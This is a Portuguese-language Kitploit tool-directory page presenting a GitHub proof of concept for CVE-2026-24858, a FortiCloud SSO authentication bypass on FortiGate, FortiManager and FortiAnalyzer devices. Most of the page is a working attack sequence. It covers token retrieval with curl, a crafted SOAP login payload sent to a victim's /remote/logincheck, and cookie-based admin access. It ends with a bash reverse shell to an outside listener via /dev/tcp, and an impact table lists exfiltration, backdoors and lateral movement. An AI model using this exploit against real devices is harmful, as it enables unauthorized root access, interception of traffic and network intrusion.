Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud Single Sign On (SSO) — um recurso habilitado por padrão de fábrica assim que você registra qualquer FortiGate/FortiManager/FortiAnalyzer — contém uma falha crítica de bypass de autenticação. | Kitploit
Ferramentas/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud Single Sign On (SSO) — um recurso habilitado por padrão de fábrica assim que você registra qualquer FortiGate/FortiManager/FortiAnalyzer — contém uma falha crítica de bypass de autenticação.

Ver Repositório
95há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24858 | Bypass de Autenticação SSO FortiCloud


Resumo Executivo

O FortiCloud Single-Sign-On (SSO), um recurso habilitado por padrão de fábrica quando você registra qualquer FortiGate/FortiManager/FortiAnalyzer, contém uma falha crítica de bypass de autenticação.

Um atacante que possua qualquer conta FortiCloud (gratuita ou paga) pode reutilizar seu token SSO para entrar nos equipamentos de outros clientes (builds ≤ listadas abaixo) sem conhecer as senhas deles.

Após a exploração, obtém acesso total à GUI de administração e shell root, permitindo interceptação de tráfego, adulteração de VPN ou movimento lateral para redes internas.

Atualize imediatamente ou desative o FortiCloud SSO até que a correção seja aplicada.


Builds Afetadas

ProdutoFirmware VulnerávelCorrigido
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9mesma major.minor+1
FortiAnalyzermesmas faixasmesma

PoC

  1. Máquina do atacante
    Listener para reverse shell:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Obter token do atacante (TTL de 15 min)

    root@kitploit:~
    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    Resposta (trecho):

    root@kitploit:~
    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    Copie o valor de access_token.

  3. Construir payload de bypass
    Salve como bypass.xml:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. Enviar para a vítima (qualquer firmware ≤ tabela acima)

    root@kitploit:~
    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → sucesso.

  5. Navegar na GUI administrativa
    Abra o navegador ou use curl com o cookie salvo:

    root@kitploit:~
    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → O Dashboard aparece sem pedir senha.

  6. Shell root (widget CLI)
    Dentro da GUI: Dashboard → CLI Console

    root@kitploit:~
    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    O listener recebe:

    root@kitploit:~
    root@FGT80ETK21000000:/#
    

Impacto

CenárioResultado
Admin somente leituraExportar configuração completa (segredos de VPN, políticas locais, hashes de usuários).
Admin com escritaAlterar regras de firewall, criar usuários locais, desabilitar logs, implantar scripts persistentes.
Shell rootExtrair config.dat, extrair chaves HA, pivotar para sub-redes internas, implantar serviço backdoor.
Movimento lateralO dispositivo se torna ponto de apoio; VLANs e túneis SSL-VPN confiáveis → violação mais profunda da rede.
Exfiltração de dadosTodo o tráfego passa pelo FortiGate → proxy transparente + injeção de certificado.
Baixar ferramenta